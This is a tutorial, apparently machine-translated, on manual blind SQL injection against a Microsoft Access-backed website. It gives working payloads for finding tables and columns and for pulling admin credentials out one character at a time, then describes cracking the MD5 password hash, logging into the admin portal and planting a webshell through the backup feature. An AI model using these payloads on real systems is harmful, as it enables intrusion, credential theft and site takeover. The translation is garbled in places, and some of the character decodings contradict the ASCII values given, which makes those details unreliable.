An article on manual ACCESS Injection

1. and user> 0 determine the database type (although the tool has already been identified, but to learn,

From the most basic)

When we see the Microsoft JET Database *** error in the ECHO, we can conclude that it is an ACCESS Database.

2. and exists (select * from Table Name) indicates that the table name does not exist.

The specified table name exists.

Here we enter and exists (select * from admin)

The returned result is normal, indicating that admin exists.

3. exists (select column name from Table Name) indicates that the column name does not exist.

It indicates that the column name exists.

Here we enter
And exists (select password from admin)
And exists (select adminname from admin)

The returned result is normal, so that the table name and column name are handled.

4. and (select top 1 len (column name) from Table Name)> x guesses the length of the column. X is a number, column length, return

The error message returned indicates that the length of the correct column is x. The number after the top is changed to guess the length of the nth row of the column.

Here we enter and (select top 1 len (adminname) from admin)> 8 8 error, 7 is good, say

Tomorrow 8 is the length of the column.

5. and (select top 1 asc (mid (column name, column number N, 1) from Table Name)> x key steps to guess the column content.

The number after top is the nth row of the column, and x is the ASCII code. column N is the nth number or word in the column.

Mother. For example, if the value of x is 50 normal, the value of 100 is incorrect, and the value of 80 is normal. If the value of x is 96 normal, the value of 97 is incorrect.

The ASCII value is 97.

Here we enter: and (select top 1 asc (mid (adminname, 1, 1) from admin)> 50

50 normal 150 error, 125 error, 110 normal, 115 normal, 120 error. 118 normal, 119 error, description

The first ASCII is 119, which is converted to w.

118 echo normal

According to the above method, the other 7 ranking items are guessed in sequence and converted using tools.
Second place is still 119 ---- w
The third 25 is normal, 50 is incorrect, 48 ---- g
Fourth digit 48----0
Fifth place 46 ----.
Sixth 99 ----- c
Seventh place 111 ----- o
Eighth place 109 ------ m

The final adminname column is wg00.com.

6. The content of the remaining passwod column is the same as the above method. However, this is troublesome and requires patience. Because I

Generally, the passwords are encrypted using MD5 encryption, which requires many guesses. I guessed 16 times this time and there should be other shortcuts,

I hope the experts will be enlightened.

And (select top 1 len (password) from admin)> 16---16-bit MD5 Encryption

The column length is 16, and the 16-bit MD5 is encrypted.

The final result of the password column is c6f4f454c781af4f. I went to the MD5 encryption and decryption website and checked

The result is the same as the user name: wg00.com. (It's so hard. Fortunately, MD5 can be decrypted. Otherwise, try hard.

In vain)

7. Use the default Management Portal, enter the user name and password that are hard to guess, and log in smoothly.

The data backup function is available in the background. webshell is simple and the manual injection is also completed!